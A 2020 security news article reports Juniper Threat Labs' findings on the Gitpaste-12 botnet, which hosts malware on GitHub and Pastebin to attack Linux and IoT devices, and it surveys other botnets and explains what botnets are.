Hackers Exploiting GitHub and Pastebin Resources to Spread Malware
- By Dawna M. Roberts
- Published: Nov 09, 2020
- Last Updated: Nov 23, 2023
Everything has ramped up in 2020, especially hackers, cybercriminals, and their techniques. Threat researchers recently discovered that hackers are using Gitpaste-12 botnet to target Linux and IoT devices.
Hackers’ Latest Trend
The latest trend seen by security professionals is hacker groups setting up botnets using legitimate resources such as Dropbox, Box, Github, and Pastebin to store malicious files undetected and make their files appear more authentic.
Recently Juniper Threat Labs published a report regarding the Gitpaste-12 botnet, which they discovered in October. However, all indications point to the fact that hackers set it up in July 2020. The report noted that Gitpaste-12 botnet uses 12 different modules of malware to attack IoT devices and Linux applications.
What concerns threat researchers the most is the widespread use of legitimate online resources for malicious file repositories. Because the malware appears to come from secure, legitimate online resources, it may be harder to discover and more dangerous for victims.
Juniper Threat Labs identified at least one purpose for Gitpaste-12, and it was crypto mining of cryptocurrency, specifically monero.
According to Alex Burt and Trevor Pott of Juniper Threat Labs, ”Almost any free hosting can be used to host malware or as a command-and-control,” Burt tells Information Security Media Group. “GitHub and Pastebin provide HTTPS access, and it is easy to create new accounts. In many cases, it’s more convenient than creating their own hosting infrastructure because GitHub and Pastebin domains are not blacklisted by security companies. From a security team’s perspective, a traffic request to GitHub would not look suspicious.”
The Juniper team contacted both Github and Pastebin to notify them of the threat, and they responded quickly by taking down the infected areas.
How it Works
Recently another cybercriminal sent out phishing emails to the faculty members of a large college urging them to take a COVID-19 survey stored on Dropbox. The template used was infected with malicious macros. Thankfully, none of the recipients clicked the link or turned on macros before the IT department found the infection and alerted the authorities.
In their report, Juniper mentions that the botnet is specifically targeting open-source projects such as Apache Struts along with routers and other network devices from well-known manufacturers like Asus, Netlink, and Huawei. The method of entry is most often a brute-force attack. Once the botnet has control of the device, it will install malicious code that periodically checks back with the command-and-control server looking for updates. Juniper explains, “The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, SELinux, AppArmor, as well as common attack prevention and monitoring software.”
After examination of the code, security researchers found some of the writing to be Chinese.
Alarmingly, some of the modules also behave like worms infecting other devices to spread and expand the botnet further.
Juniper’s Burt and Pott comment, “No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.”
So Many Threats on the Horizon
Over the past year, quite a few botnets have been discovered and a few temporarily disabled by authorities. Many are built specifically to target IoT devices and Linux applications. One such botnet, Kaiji, uses brute-force to target SSH protocols and uses denial-of-service attacks as well.
Just last month, in a joint effort, Microsoft and some government agencies took down the notorious Trickbot botnet crippling its operations, at least for now.
Additionally, hackers are using another botnet named Kashmir Black to target vulnerable CMS system websites like WordPress, Joomla, and Magneto.
As reported by DataBreach Today, Avira Protection Lab identified another botnet using a variant of Mirai to target IoT devices. This particular threat is highly sophisticated with individual encryption keys, denial-of-service capabilities, and self-replication techniques built-in.
Why Botnets?
The term botnet is thrown around pretty liberally these days. So, what is a botnet? According to Kaspersky Labs, “Botnets are networks of hijacked computer devices used to carry out various scams and cyberattacks.” It’s also a combination of the two words “robot” and “network.”
These networks are set up to link exploited devices together to create a vast network of computers, applications, and other hardware that can then infect other devices for the theft of data, malware, ransomware infections, or other purposes. Usually, botnets are used in multi-layer schemes, and infecting the devices is only step one. Kaspersky has a great article here that explains all about botnets.
The reason this model works so well is that once activated, the botnet works on its own, automating the process of growing the network and infecting devices. Botnets save time and effort so that hackers can focus on the prize.
